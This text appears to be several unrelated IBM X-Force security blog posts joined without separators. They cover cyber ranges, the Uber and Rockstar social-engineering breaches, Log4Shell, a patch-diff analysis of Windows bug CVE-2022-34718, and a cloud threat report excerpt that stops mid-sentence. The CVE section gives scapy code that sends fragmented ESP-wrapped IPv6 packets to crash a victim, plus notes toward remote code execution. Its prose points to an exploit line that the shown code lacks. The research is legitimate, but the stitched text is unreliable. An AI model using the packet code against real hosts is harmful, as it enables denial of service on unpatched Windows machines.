With awareness of third-party risk management growing, software supply chain risk increasing and attacks in this realm more complex than ever, we are seeing customers ask to take their cyber readiness and exercises to the ecosystem level.
This is more than a concept to consider eventually: we see some companies demanding this participation as a condition of a partnership or of becoming a key vendor. Chief information security officers (CISOs) and risk teams want to see beyond SOC 2 or ISO 27001 attestations and test the actual capabilities and readiness of their core partners and vendors.
For example, if an organization uses a bank that employs a payment processor that subsequently uses a clearinghouse, all three are tightly knit and have likely established some playbooks on how to work together, how to identify where the chain of interactions encounters a problem or when a breach has occurred. Ultimately, they should know how to contain and stop a cyberattack involving one or more of the three entities. Proactively establishing a risk-aware working relationship and identifying and introducing specific risks for each stakeholder can facilitate a more robust, comprehensive and rapid response in case of an attack. Often this is the point of bringing several parties into the collaborative exercise: to set up the procedures and norms for a collaborative response that’s agile and precise.
Keeping Your Training and Range Lively With Fresh Content and Context
A key part of why we believe organizations are seeking to build their own cyber ranges is the rapid acceleration of attack types and the extent of attacks. Threats that used to emerge over the course of months now emerge in weeks or days. CISOs and risk management leaders recognize this and understand that there are two key ways to address this shift:
Increase the frequency of exercises
Improve the content of exercises to keep things fresh over time
With cyber ranges, we can use both static, curriculum-driven content for stage 1 exercises and push evolving content with industry context for those moving to more elaborate exercises. We typically insert lessons and exercises based on attacks that may be happening concurrently with the exercise itself.
Ideally, you want your range to allow for customizable content that can be modified on the fly. This allows a company with a cyber range to load up an exercise on a major attack days after the attack is revealed. That capability makes cyber ranges more relevant and valuable because it enables organizations to speed up their security metabolism and learn faster.
Conclusion: Are You Ready for a Dedicated Cyber Range?
Before you get to the point of thinking about a dedicated cyber range, we highly recommend you work through stage 1 and stage 2 capabilities. At a minimum, you should run a cyber range exercise as a one-off to see how it works for your team and your organization. Most crucially, consider what the utilization rate of your cyber range will be when planning. Ideally, it should be in use most of the time to maximize your investment. Think through whether this is viable for your team and your enterprise before pulling the trigger. As a mitigating factor, think through whether you can use your dedicated cyber range as a pop-up or quick-start cyber operations command center in case of emergency.
After you feel comfortable with the idea of a cyber range and have confirmed its value, consider the positives and negatives of the three types of cyber ranges or outsourcing exercises to a trusted vendor.
Dedicated on-premise ranges are more expensive to build and maintain but can help teams create in-person chemistry. This has become a more viable option in the past year as more workforces are convening in person again.
Creating an entirely virtual cyber range prior to the pandemic was not something many organizations were considering. Virtual versions are cheaper to stand up and upgrade and offer more flexibility. However, for some organizations, face-to-face interactions are important.
A number of customers have come to us requesting hybrid versions with both virtual and in-person components. Hybrid models are flexible and can extend to vendors and partners, but they are also the most expensive installations.
Having a cyber range at the ready is a fabulous foundation for upping your security metabolism and readiness. Follow a rigorous decision-making process to ensure you get the right kind for your organization and needs. To learn whether a cyber range is right for your organization and how to set up a cyber range program, talk to IBM X-Force Cyber Range Consulting here.
On September 19, 2022, an 18-year-old cyberattacker known as “teapotuberhacker” (aka TeaPot) allegedly breached the Slack messages of game developer Rockstar Games. Using this access, they pilfered over 90 videos of the upcoming Grand Theft Auto VI game. They then posted those videos on the fan website GTAForums.com. Gamers got an unsanctioned sneak peek of game footage, characters, plot points and other critical details. It was a game developer’s worst nightmare.
In addition, the malicious actor claimed responsibility for a similar security breach affecting ride-sharing company Uber just a week prior. According to reports, they infiltrated the company’s Slack by tricking an employee into granting them access. Then, they spammed the employees with multi-factor authentication (MFA) push notifications until they gained access to internal systems, where they could browse the source code.
Incidents like the Rockstar and Uber hacks should serve as a warning to all CISOs. Proper security must consider the role info-hungry actors and audiences can play when dealing with sensitive information and intellectual property.
Stephanie Carruthers, Chief People Hacker for the X-Force Red team at IBM Security, broke down how the incident at Uber happened and what helps prevent these types of attacks.
“But We Have MFA”
First, Carruthers believes one likely scenario is that the person targeted at Uber was a contractor. The hacker likely purchased stolen credentials belonging to this contractor on the dark web as an initial step in their social engineering campaign. The attacker then likely used those credentials to log into one of Uber’s systems. However, Uber had multi-factor authentication (MFA) in place, and the attacker was asked to validate their identity multiple times.
According to reports, “TeaPot” contacted the target victim directly with a phone call, pretended to be IT, and asked them to approve the MFA requests. Once they did, the attacker logged in and could access different systems, including Slack and other sensitive areas.
“The key lesson here is that just because you have measures like MFA in place, it doesn’t mean you’re secure or that attacks can’t happen to you,” Carruthers said. “For a very long time, a lot of organizations were saying, ‘Oh, we have MFA, so we’re not worried.’ That’s not a good mindset, as demonstrated in this specific case.”
As part of her role with X-Force, Carruthers conducts social engineering assessments for organizations. She has been doing MFA bypass techniques for clients for several years. “That mindset of having a false sense of security is one of the things I think organizations still aren’t grasping because they think they have the tools in place so that it can’t happen to them.”
Social Engineering Tests Can Help Prevent These Types of Attacks
According to Carruthers, social engineering tests fall into two buckets: remote and onsite. She and her team look at phishing, voice phishing and smishing for remote tests. The onsite piece involves the X-Force team showing up in person and essentially breaking into a client’s facilities and, from there, its network. During the testing, the X-Force teams attempt to talk employees into giving them information that would allow them to breach systems, taking note of those who try to stop them and those who do not.
The team’s remote test focuses on an increasingly popular approach: layering the methods together almost like an attack chain. Instead of only conducting a phishing campaign, this adds another step to the mix.
“What we’ll do, just like you saw in this Uber attack, is follow up on the phish with phone calls,” Carruthers said. “Targets will tell us the phish sounded suspicious but then thank us for calling because we have a friendly voice. And they’ll actually comply with what that phishing email requested. But it’s interesting to see attackers starting to layer on social engineering approaches rather than just hoping one of their phishing emails work.”
She explained that the team’s odds of success go up threefold when following up with a phone call. According to IBM’s 2022 X-Force Threat Intelligence Index, the click rate for the average targeted phishing campaign was 17.8%. Targeted phishing campaigns that added phone calls (vishing, or voice phishing) were three times more effective, netting a click from 53.2% of victims.
What Is OSINT — and How It Helps Attackers Succeed
For bad actors, the more intelligence they have on their target, the better. Attackers typically gather intelligence by scraping data readily available from public sources, known as open source intelligence (OSINT). Thanks to social media and publicly documented online activities, attackers can easily profile an organization or employee.
Carruthers says she’s spending more time today doing OSINT than ever before. “Actively getting info on a company is so important because that gives us all of the bits and pieces to build that campaign that’s going to be realistic to our targets,” she said. “We often look for people who have access to more sensitive information, and I wouldn’t be surprised if that person (in the Uber hack) was picked because of the access they had.”
For Carruthers, it’s critical to understand what information is out there about employees and organizations. “That digital footprint could be leveraged against them,” she said. “I can’t tell you how many times clients come back to us saying they couldn’t believe we found all these things. A little piece of information that seems harmless could be the cherry on top of our campaign that makes it look much more realistic.”
Tangible Hack Prevention Strategies
While multi-factor authentication can be bypassed, it is still a critical security tool. Beyond that, Carruthers suggests that organizations consider deploying a physical device such as a FIDO2 token. This option shouldn’t be too difficult to manage for small to medium-sized businesses.
“Next, I recommend using password managers with long, complex master passwords so they can’t be guessed or cracked or anything like that,” she said. “Those are some of the best practices for applications like Slack.”
Of course, no hacking prevention strategies that address social engineering would be complete without security awareness. Carruthers advises organizations to be aware of attacks out in the wild and be ready to address them. “Companies need to actually go through and review what’s included in their current training, and whether it’s addressing the realistic attacks happening today against their organization,” she said.
For example, the training may teach employees not to give their passwords to anyone over the phone. But when an attacker calls, they may not ask for your password. Instead, they may ask you to log in to a website that they control. Organizations will want to ensure their training is always fresh and interactive and that employees stay engaged.
The final piece of advice from Carruthers is for companies to refrain from relying too heavily on security tools. “It’s so easy to say that you can purchase a certain security tool and that you’ll never have to worry about being phished again,” she said.
The key takeaways here are:
Incorporate physical devices into MFA. This builds a significant roadblock for attackers.
Try to minimize your digital footprint. Avoid oversharing in public forums like social media.
Use password managers. This way, employees only need to remember one password.
Bolster security awareness programs with particular focus on social engineering threats. Far too often, security awareness misses this key element.
Don’t rely too heavily on security tools. They can only take your security posture so far.
Finally, it’s important to reiterate what Carruthers and the X-Force team continue to prove with their social engineering tests: a false sense of security is counterproductive to preventing attacks. A more effective strategy combines quality security practices with awareness, adaptability and vigilance.
Learn more about X-Force Red penetration testing services here. To schedule a no-cost consult with X-Force, click here.
In late 2021, the Apache Software Foundation disclosed a vulnerability that set off a panic across the global tech industry. The bug, known as Log4Shell, was found in the ubiquitous open-source logging library Log4j, and it exposed a huge swath of applications and services.
Nearly anything from popular consumer and enterprise platforms to critical infrastructure and IoT devices was exposed. Over 35,000 Java packages were impacted by Log4j vulnerabilities. That’s over 8% of the Maven Central repository, the world’s largest Java package repository.
When Log4Shell was disclosed, CISA Director Jen Easterly said, “This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious.”
Since Log4j surfaced, how has the security community responded? What lessons have we learned (or not learned)?
Significant Lingering Threat
Log4Shell is no longer the acute, widespread emergency it once was. Still, researchers warn that the vulnerability remains present in far too many systems, and threat actors will continue to exploit it for years to come.
Log4Shell was unusual because it was so easy to exploit wherever it was present. Developers use logging utilities to record operations in applications. To exploit Log4Shell, all an attacker has to do is get the system to log a specially crafted string. From there, they can take control of the victim’s system to install malware or launch other attacks.
“Logging is fundamental to essentially any computer software or hardware operation. Whether it’s a phlebotomy machine or an application server, logging is going to be present,” said David Nalley, president of the nonprofit Apache Software Foundation, in an interview with Wired. “We knew Log4j was widely deployed, we saw the download numbers, but it’s hard to fully grasp since in open source you’re not selling a product and tracking contracts. I don’t think you fully appreciate it until you have a full accounting of where software is, everything it’s doing and who’s using it. And I think the fact that it was so incredibly ubiquitous was a factor in everyone reacting so immediately. It’s a little humbling, frankly.”
According to Nalley, the foundation had software fixes out within two weeks. Alarmingly, Apache still sees up to 25% of Log4j downloads going to unpatched versions.
Continued Log4j Attack Incidents
Threat actors continue to exploit the Log4j vulnerability to this day. CISA has released alerts regarding Iranian and Chinese actors using the exploit. Iranian cyber threat actors took advantage of the Log4Shell vulnerability in an unpatched VMware Horizon server, installed crypto mining software, moved laterally to the domain controller, compromised credentials and implanted reverse proxies on several hosts to maintain persistence. Meanwhile, Log4j tops the list of Common Vulnerabilities and Exposures (CVEs) most exploited by Chinese state-sponsored cyber actors since 2020.
Given the danger and ongoing threat, why do so many vulnerable versions of Log4j still persist? Could it be that some IT pros don’t really know what’s in their software?
The Risk of Open-Source Software
The problem isn’t software vulnerability alone. It’s also not knowing whether vulnerable code is hiding in your applications. Surprisingly, many security and IT professionals have no idea whether Log4j is part of their software supply chain. Or even worse, they choose to ignore the danger.
Part of the challenge is due to the rise of open-source software (OSS). Coders leverage OSS to accelerate development, cut costs and reduce time to market. Easy access to open-source frameworks and libraries takes the place of writing custom code or buying proprietary software. And while many applications get built quickly, the exact contents might not be known.
According to the Linux Foundation’s SBOM and Cybersecurity Readiness report, 98% of organizations surveyed use open-source software. Given the explosion of OSS use, the security of the supply chain behind any given application can be nearly impossible to gauge. If you don’t know what’s in your supply chain, how can you possibly know it’s secure?
Security Starts With SBOM
The threat of vulnerabilities (both known and zero-day) combined with the unknown contents of software packages has led security regulators and decision-makers to push for the development of software bills of materials.
According to CISA:
A “software bill of materials” (SBOM) has emerged as a key building block in software security and software supply chain risk management. An SBOM is a nested inventory, a list of ingredients that make up software components.
If you have a detailed list of individual software components, you can assess risk exposure more accurately. Also, with a well-developed SBOM, you can match your list against CISA’s Known Exploited Vulnerabilities Catalog. Or, if you hear about an emerging mass exploit like Log4j, you can quickly confirm if your stack is at risk. If you don’t have an SBOM, you’re in the dark until you are notified by your vendor or until you get hacked.
Finding Millions of Vulnerabilities
If you were to scan your systems for software vulnerabilities, you might discover hundreds of thousands of weaknesses. And if you recently merged with another company, you inherit its risk burden as well. For larger enterprises, detected vulnerabilities can number in the millions.
Trying to patch everything at once would be impossible. Instead, proper triage is essential. For example, vulnerabilities nearest to mission-critical systems should be prioritized. Also, an organization should audit, monitor and test its software vulnerability profile often. And since IT teams might add applications at any moment, an up-to-date network inventory and scheduled vulnerability scanning are critical. Automated software vulnerability management programs can be a great help here.
Many companies don’t have the time or qualified resources to identify, prioritize and remediate vulnerabilities. The process can be overwhelming. Given the high risk involved, some organizations opt to hire expert vulnerability mitigation services.
Still More to Learn
While Log4j sent some into a frenzy, others didn’t even seem to notice. This gives rise to the debate about cyber responsibility. If my partner hasn’t patched a vulnerability, and it affects my operations, should my partner be held responsible?
In one survey, 87% of respondents said that given the level of cyber risk posed by Log4j, government regulatory agencies (such as the U.S. Federal Trade Commission) should take legal action against organizations that fail to patch the flaw.
Only time will tell how far the security community will take responsibility for vulnerabilities — whether by being proactive or by force.
September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.”
Pure remote vulnerabilities usually generate a lot of interest, but even more than a month after the patch, no additional information beyond Microsoft’s advisory had been published. It had also been a long time since I had attempted a binary patch diff analysis, so this seemed like a good bug for root cause analysis and a proof-of-concept (PoC) for a blog post.
On October 21 of last year, I posted an exploit demo and root cause analysis of the bug. Shortly thereafter, a blog post and PoC were published by Numen Cyber Labs on the vulnerability, using a different exploitation method than the one in my demo.
In this blog — my follow-up article to my exploit video — I include an in-depth explanation of the reverse engineering of the bug and correct some inaccuracies I found in the Numen Cyber Labs blog.
In the following sections, I cover reverse engineering the patch for CVE-2022-34718, the affected protocols, identifying the bug, and reproducing it. I’ll outline setting up a test environment and write an exploit to trigger the bug and cause a Denial of Service (DoS). Finally, I’ll look at exploit primitives and outline the next steps to turn the primitives into remote code execution (RCE).
Patch Diffing
Microsoft’s advisory does not contain any specific details of the vulnerability except that it is contained in the TCP/IP driver and requires IPsec to be enabled. In order to identify the specific cause of the vulnerability, we’ll compare the patched binary to the pre-patch binary and try to extract the “diff”(erence) using a tool called BinDiff.
I used Winbindex to obtain two versions of tcpip.sys: one right before the patch and one right after, both for the same version of Windows. Getting sequential versions of the binaries is important; even versions a few updates apart can introduce noise from differences unrelated to the patch and waste analysis time. Winbindex has made patch analysis easier than ever, as you can obtain any Windows binary beginning from Windows 10. I loaded both files in Ghidra, applied the Program Database (PDB) files, and ran auto analysis (enabling the aggressive instruction finder option works best). Afterward, the files can be exported into BinExport format using the BinExport for Ghidra extension. The files can then be loaded into BinDiff to create a diff and start analyzing their differences:
BinDiff summary comparing the pre- and post-patch binaries
BinDiff works by matching functions in the binaries being compared using various algorithms. In this case, we have applied function symbol information from Microsoft, so all the functions can be matched by name.
List of matched functions sorted by similarity
Above we see there are only two functions that have a similarity less than 100%. The two functions that were changed by the patch are IppReceiveEsp and Ipv6pReassembleDatagram.
Vulnerability Root Cause Analysis
Previous research shows the Ipv6pReassembleDatagram function handles reassembling Ipv6 fragmented packets.
The function name IppReceiveEsp seems to indicate this function handles the receiving of IPsec ESP packets.
Before diving into the patch, I’ll briefly cover Ipv6 fragmentation and IPsec. Having a general understanding of these packet structures will help when attempting to reverse engineer the patch.
IPv6 Fragmentation:
An IPv6 packet can be divided into fragments with each fragment sent as a separate packet. Once all of the fragments reach the destination, the receiver reassembles them to form the original packet.
The diagram below illustrates the fragmentation:
Illustration of Ipv6 fragmentation
According to the RFC, fragmentation is implemented via an Extension Header called the Fragment header, which has the following format:
Ipv6 Fragment Header format
Where the Next Header field is the type of header present in the fragmented data.
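To make the format concrete, here is a small scapy sketch that builds a fragmented ICMPv6 Echo Request and prints the Fragment header fields just described. The destination address, payload size and fragment size are placeholders.

# Sketch: build IPv6 fragments with scapy and inspect the Fragment header fields.
from scapy.layers.inet6 import IPv6, IPv6ExtHdrFragment, ICMPv6EchoRequest, fragment6

# Placeholder destination; fragment6() expects the packet to already carry
# a Fragment extension header that it can populate for each fragment.
pkt = IPv6(dst="fd00::2") / IPv6ExtHdrFragment() / ICMPv6EchoRequest(data=b"A" * 3000)
frags = fragment6(pkt, fragSize=1280)

for frag in frags:
    fh = frag[IPv6ExtHdrFragment]
    # nh = Next Header, offset = fragment offset (8-byte units), m = More Fragments flag
    print(f"nh={fh.nh} offset={fh.offset} m={fh.m} id={hex(fh.id)}")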
IPsec (ESP):
IPsec is a group of protocols that are used together to set up encrypted connections. It’s often used to set up Virtual Private Networks (VPNs). From the first part of patch analysis, we know the bug is related to the processing of ESP packets, so we’ll focus on the Encapsulating Security Payload (ESP) protocol.
As the name suggests, the ESP protocol encrypts (encapsulates) the contents of a packet. There are two modes: in tunnel mode, a copy of the IP header is contained in the encrypted payload; in transport mode, only the transport layer portion of the packet is encrypted. Like IPv6 fragmentation, ESP is implemented as an extension header. According to the RFC, an ESP packet is formatted as follows:
Top Level Format of an ESP Packet
Where Security Parameters Index (SPI) and Sequence Number fields comprise the ESP extension header, and the fields between and including Payload Data and Next Header are encrypted. The Next Header field describes the header contained in Payload Data.
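Scapy also models the ESP layer, which is handy for seeing this layout in practice. The sketch below, with placeholder SPI, key and addresses, uses a transport-mode SecurityAssociation to encrypt a packet; after encryption, only the SPI and Sequence Number remain readable, while Payload Data, Padding, Pad Length and Next Header sit inside the opaque payload exactly as the RFC describes.

# Sketch: encrypt a packet with a scapy SecurityAssociation (ESP, transport mode).
# SPI, key and addresses are placeholders for illustration only.
from scapy.layers.inet6 import IPv6, ICMPv6EchoRequest
from scapy.layers.ipsec import SecurityAssociation, ESP

sa = SecurityAssociation(
    ESP,
    spi=0x1001,
    crypt_algo="AES-CBC",
    crypt_key=b"0123456789abcdef",  # 16-byte demo key
    auth_algo="NULL",
    auth_key=None,
)

plain = IPv6(src="fd00::1", dst="fd00::2") / ICMPv6EchoRequest(data=b"ping")
enc = sa.encrypt(plain)

# Only the SPI and sequence number are visible after encryption;
# Payload Data, Padding, Pad Length and Next Header live inside ESP.data.
print(enc[ESP].spi, enc[ESP].seq, len(enc[ESP].data))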
Now, with a primer on IPv6 fragmentation and IPsec ESP, we can continue the patch diff analysis by examining the two functions we found were patched.
Ipv6pReassembleDatagram
Comparing the side by side of the function graphs, we can see that a single new code block has been introduced into the patched function:
Side-by-side comparison of the pre- and post-patch function graphs of Ipv6pReassembleDatagram
Let’s take a closer look at the block:
New code block in the patched function
The new code block is doing a comparison of two unsigned integers (in registers EAX and EDX) and jumping to a block if one value is less than the other. Let’s take a look at that destination block:
The target code has an unconditional call to the function IppDeleteFromReassemblySet. Judging from the function’s name, this block appears to be error handling. We can intuit that the newly added code is some sort of bounds check, with a “goto error” path inserted for when the check fails.
With this bit of insight, we can perform static analysis in a decompiler.
0vercl0ck previously published a blog post doing vulnerability analysis on a different Ipv6 vulnerability and went deep into the reverse engineering of tcpip.sys. From this work and some additional reverse engineering, I was able to fill in structure definitions for the undocumented Packet_t and Reassembly_t objects, as well as identify a couple of crucial local variable assignments.
Decompilation output of Ipv6pReassembleDatagram
In the above code snippet, the pink box surrounds the new code added by the patch. Reassembly->nextheader_offset contains the byte offset of the Next Header field in the IPv6 fragment header. The bounds check compares nextheader_offset to the length of the header buffer. On line 29, HeaderBufferLen is used to allocate a buffer, and on line 35, Reassembly->nextheader_offset is used to index and copy into the allocated buffer.
Because this check was added, we now know there was a condition that allows nextheader_offset to exceed the header buffer length. We’ll move on to the second patched function to seek more answers.
IppReceiveEsp
Looking at the function graph side by side in the BinDiff workspace, we can identify some new code blocks introduced into the patched function:
Side-by-side comparison of the pre- and post-patch function graphs of IppReceiveEsp
The image below shows the decompilation of the function IppReceiveEsp, with a pink box surrounding the new code added by the patch.
Decompilation output of IppReceiveESP
Here, a new check was added to examine the Next Header field of the ESP packet. The Next Header field identifies the header of the decrypted ESP packet. Recall that a Next Header value can correspond to an upper layer protocol (such as TCP or UDP) or an extension header (such as fragmentation header or routing header). If the value in NextHeader is 0, 0x2B, or 0x2C, IppDiscardReceivedPackets is called and the error code is set to STATUS_DATA_NOT_ACCEPTED. These values correspond to IPv6 Hop-by-Hop Option, Routing Header for Ipv6, and Fragment Header for IPv6, respectively.
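In Python terms, the logic of the added check is roughly the following. This is a paraphrase of the decompiled behavior for readability, not Microsoft’s actual code.

# Paraphrase of the patched check in IppReceiveEsp (not Microsoft's source).
HOP_BY_HOP = 0x00   # IPv6 Hop-by-Hop Options header
ROUTING    = 0x2B   # Routing Header for IPv6
FRAGMENT   = 0x2C   # Fragment Header for IPv6

def accept_decrypted_esp(next_header: int) -> bool:
    # Post-patch: extension headers that must precede ESP are rejected here.
    if next_header in (HOP_BY_HOP, ROUTING, FRAGMENT):
        # In the driver this path calls IppDiscardReceivedPackets and
        # sets the error code to STATUS_DATA_NOT_ACCEPTED.
        return False
    return True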
Referring back to the ESP RFC it states, “In the IPv6 context, ESP is viewed as an end-to-end payload, and thus should appear after hop-by-hop, routing, and fragmentation extension headers.” Now the problem becomes clear. If a header of these types is contained within an ESP payload, it violates the RFC of the protocol, and the packet will be discarded.
Putting It All Together
Now that we have diagnosed the patches in two different functions, we can figure out how they are related. In the first function, Ipv6pReassembleDatagram, we determined the fix was for a buffer overflow.
Decompilation output of Ipv6pReassembleDatagram
Recall that the size of the victim buffer is calculated as the size of the extension headers plus the size of an IPv6 header (line 10 above). Now refer back to the patch that was inserted (line 16). Reassembly->nextheader_offset refers to the offset of the Next Header value within the buffer holding the data for the fragment.
Now refer back to the structure of an ESP packet:
Top Level Format of an ESP Packet
Notice that the Next Header field comes *after* Payload Data. This means that Reassembly->nextheader_offset will include the size of the Payload Data, which is attacker-controlled and can be much greater than the size of the extension headers. The Next Header field is normally located inside an extension header or the IPv6 header; in an ESP packet, however, it is contained in the encrypted portion at the end of the packet rather than in a header.
Illustrated root cause of CVE-2022-34718
Now refer back to line 35 of Ipv6pReassembleDatagram: this is where the out-of-bounds write occurs, a single byte whose value is taken from the Next Header field.
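As a rough worked example, with illustrative sizes rather than measured values: the reassembly buffer only accounts for the IPv6 header plus the extension headers, while the offset used to write the Next Header byte grows with the attacker-controlled ESP Payload Data.

# Illustrative numbers only; the point is the inequality, not the exact sizes.
IPV6_HEADER_LEN   = 40   # fixed IPv6 header
FRAG_HEADER_LEN   = 8    # Fragment extension header
PAYLOAD_DATA_LEN  = 200  # attacker-controlled ESP Payload Data
PADDING_LEN       = 2    # ESP Padding
PAD_LENGTH_FIELD  = 1    # 1-byte Pad Length field

header_buffer_len = IPV6_HEADER_LEN + FRAG_HEADER_LEN                    # what gets allocated
nextheader_offset = PAYLOAD_DATA_LEN + PADDING_LEN + PAD_LENGTH_FIELD    # where the byte lands

print(header_buffer_len, nextheader_offset)    # 48 vs 203: well past the end of the buffer
assert nextheader_offset > header_buffer_len   # the condition the patch now rejects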
Reproducing the Bug
We now know the bug can be triggered by sending an IPv6 fragmented datagram via IPsec ESP packets.
The next question to answer: how will the victim be able to decrypt the ESP packets?
To answer this question, I first tried to send packets containing an ESP header with junk data to a victim and put a breakpoint on the vulnerable IppReceiveEsp function to see if it could be reached. The breakpoint was hit, but the internal function I thought did the decrypting, IppReceiveEspNbl, returned an error, so the vulnerable code was never reached. I further reverse engineered IppReceiveEspNbl and worked my way through to the point of failure. This is where I learned that in order to successfully decrypt an ESP packet, a security association must be established.
A security association consists of a shared state, primarily cryptographic keys and parameters, maintained between two endpoints to secure traffic between them. In simple terms, a security association defines how a host will encrypt/decrypt/authenticate traffic coming from/going to another host. Security associations can be established via the Internet Key Exchange (IKE) or Authenticated IP Protocol. In essence, we need a way to establish a security association with the victim, so that it knows how to decrypt the incoming data from the attacker.
For testing purposes, instead of implementing IKE, I decided to create a security association on the victim manually. This can be done using the Windows Filtering Platform (WFP) API. Numen’s blog post stated that it’s not possible to use WFP for secret key management. However, that is incorrect: by modifying sample code provided by Microsoft, it’s possible to set a symmetric key that the victim will use to decrypt ESP packets coming from the attacker’s IP.
Exploitation
Now that the victim knows how to decrypt ESP traffic from us (the attacker), we can build malformed, encrypted ESP packets with scapy, which lets us craft and send packets at the IP layer. The exploitation process is simple:
CVE-2022-34718 PoC
I create a set of fragments from an ICMPv6 Echo Request; each fragment is then encapsulated in an encrypted ESP layer before being sent.
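The sketch below reconstructs that flow in scapy. It is not the original PoC from the demo: the addresses, SPI, key and sizes are placeholders and must match the security association configured on the victim, and depending on how scapy splits extension headers in transport mode, the ESP payload may need to be assembled manually so that the Fragment header ends up inside the encrypted portion.

# Reconstruction sketch of the exploitation flow (not the original PoC):
# fragment an ICMPv6 Echo Request, then encrypt each fragment as ESP and send it.
from scapy.layers.inet6 import IPv6, IPv6ExtHdrFragment, ICMPv6EchoRequest, fragment6
from scapy.layers.ipsec import SecurityAssociation, ESP
from scapy.sendrecv import send

ATTACKER = "fd00::1"   # placeholder addresses
VICTIM   = "fd00::2"

# Must mirror the security association installed on the victim (SPI, algorithm, key).
sa = SecurityAssociation(
    ESP,
    spi=0x1001,
    crypt_algo="AES-CBC",
    crypt_key=b"0123456789abcdef",
    auth_algo="NULL",
    auth_key=None,
)

# An oversized echo request forces fragmentation; the payload length steers
# how far past the reassembly buffer the Next Header byte is written.
echo = IPv6(src=ATTACKER, dst=VICTIM) / IPv6ExtHdrFragment() / ICMPv6EchoRequest(data=b"A" * 2000)

for frag in fragment6(echo, fragSize=1280):
    # Caveat: the vulnerable path requires the decrypted Next Header to indicate a
    # Fragment header, i.e. the Fragment header must sit inside the ESP payload.
    send(sa.encrypt(frag))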
Primitive
From the root cause analysis diagram pictured above, we know our primitive gives us an out-of-bounds write past the end of the header buffer, at an offset determined by where the Next Header byte sits in the decrypted ESP payload. The value of the write is controllable via the value of the Next Header field. I set this value on line 36 in my exploit above (0x41 😉).
Denial of Service (DoS)
Corrupting just one byte at a random offset in the NetIoProtocolHeader2 pool (where the target buffer is allocated) usually does not immediately cause a crash. We can reliably crash the target by inserting additional headers within the fragmented message for the driver to parse, or by repeatedly pinging the target after corrupting a large portion of the pool.
Limitations to Overcome For RCE
The write offset is attacker-controlled; however, according to the ESP RFC, padding is required such that the Integrity Check Value (ICV) field (if present) is aligned on a 4-byte boundary. Because sizeof(Pad Length) = sizeof(Next Header) = 1, the sum sizeof(Payload Data) + sizeof(Padding) + 2 must be 4-byte aligned, and therefore:

offset = 4n - 1
Where n can be any positive integer, constrained by the fact the payload data and padding must fit within a single packet and is therefore limited by MTU (frame size). This is problematic because it means full pointers cannot be overwritten. This is limiting, but not necessarily prohibitive; we can still overwrite the offset of an address in an object, a size, a reference counter, etc. The possibilities available to us depend on what objects can be sprayed in the kernel pool where the victim headerBuff is allocated.
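A small helper makes the constraint easy to explore. The MTU and the ESP overhead allowance below are illustrative assumptions, not measured values.

# Enumerate reachable write offsets: offset = 4n - 1, bounded by the MTU.
def reachable_offsets(mtu=1500, esp_overhead=64):
    # esp_overhead is a rough allowance for the IPv6 and ESP headers, IV and ICV.
    max_payload_plus_padding = mtu - esp_overhead
    offsets = []
    n = 1
    while True:
        offset = 4 * n - 1
        # offset = sizeof(Payload Data) + sizeof(Padding) + 1, so it must fit in the packet.
        if offset - 1 > max_payload_plus_padding:
            break
        offsets.append(offset)
        n += 1
    return offsets

print(reachable_offsets()[:8])   # [3, 7, 11, 15, 19, 23, 27, 31]

Full 8-byte pointers can never be covered by a single 1-byte write at these offsets, which is exactly the limitation discussed above.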
Heap Grooming Research
The affected kernel pool in WinDbg
The victim out-of-bounds buffer is allocated in the NetIoProtocolHeader2 pool. The first steps in heap grooming research are examining the types of objects allocated in this pool, what they contain, how they are used, and how they are allocated and freed. This will allow us to examine how the write primitive can be used to obtain a leak or build a stronger primitive. We are not necessarily restricted to NetIoProtocolHeader2; however, because the position of the victim out-of-bounds buffer cannot be predicted, and the addresses of surrounding pools are randomized, targeting other pools seems challenging.
Demo
Watch the demo exploiting CVE-2022-34718 ‘EvilESP’ for DoS below:
Takeaways
When laid out like this, the bug seems pretty simple. However, it took several long days of reverse engineering and learning about various networking stacks and protocols to understand the full picture and write a DoS exploit. Many researchers will say that configuring the setup and understanding the environment is the most time-consuming and tedious part of the process, and this was no exception. I am very glad that I decided to do this short project; I understand Ipv6, IPsec, and fragmentation much better now.
To learn how IBM Security X-Force can help you with offensive security services, schedule a no-cost consult meeting here: IBM X-Force Scheduler.
If you are experiencing cybersecurity issues or an incident, contact X-Force to help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.
As cybercriminals remain steadfast in their pursuit of unsuspecting ways to infiltrate today’s businesses, a new report by IBM Security X-Force highlights the top tactics of cybercriminals, the open doors users are leaving for them and the burgeoning marketplace for stolen cloud resources on the dark web. The big takeaway from the data is businesses still control their own destiny when it comes to cloud security. Misconfigurations across applications, databases and policies could have stopped two-thirds of breached cloud environments observed by IBM in this year’s report.
IBM’s 2021 X-Force Cloud Security Threat Landscape Report has expanded from the 2020 report with new and more robust data, spanning Q2 2020 through Q2 2021. Data sets we used include dark web analysis, IBM Security X-Force Red penetration testing data, IBM Security Services metrics, X-Force Incident Response analysis and X-Force Threat Intelligence research. This expanded dataset gave us an unprecedented view across the whole technology estate to make connections for improving security. Here are some quick highlights:
Configure it Out — Two out of three breached cloud environments studied were caused by improperly configured application programming interfaces (APIs). X-Force incident responders also observed virtual machines with default security settings that were erroneously exposed to the Internet, including misconfigured platforms and insufficiently enforced network controls.
Rulebreakers Lead to Compromise — X-Force Red found password and policy violations in the vast majority of cloud penetration tests conducted over the past year. The team also observed significant growth in the severity of vulnerabilities in cloud-deployed applications, and the number of disclosed vulnerabilities in these applications has rocketed 150% over the last five years.
Automatic for the Cybercriminals — With nearly 30,000 compromised cloud accounts for sale at bargain prices on dark web marketplaces and Remote Desktop Protocol accounting for 70% of cloud resources for sale, cybercriminals have turnkey options to further automate their access to cloud environments.
All Eyes on Ransomware & Cryptomining — Cryptominers and ransomware remain the top dropped malware into cloud environments, accounting for over 50% of detected system compromises, based on the data analyzed.
More and more businesses are recognizing the business value of hybrid cloud and distributing their data across a diverse infrastructure. In fact, the 2021 Cost of a Data Breach Report revealed that breached organizations implementing a primarily public or private cloud approach suffered approximately $1 million more in breach costs than organizations with a hybrid cloud approach.
With businesses seeking heterogeneous environments to distribute their workloads and better control where their most critical data is stored, modernization of those applications is becoming a point of control for security. The report is putting a spotlight on security policies that don’t encompass the cloud, increasing the security risks businesses are facing in disconnected environments. Here are a few examples:
